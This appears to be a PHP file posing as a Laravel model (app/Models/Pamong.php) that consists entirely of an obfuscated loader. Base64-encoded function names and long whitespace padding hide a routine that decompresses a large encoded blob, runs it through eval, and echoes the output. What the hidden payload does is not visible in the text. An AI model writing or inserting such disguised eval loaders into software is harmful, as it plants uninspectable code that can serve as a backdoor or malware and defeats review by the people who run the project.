<?php 
        $__='printf';$_='Loading app/Models/Pamong.php';
        























































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






















































































































































































                                                                                                                                                                                                                     $________;
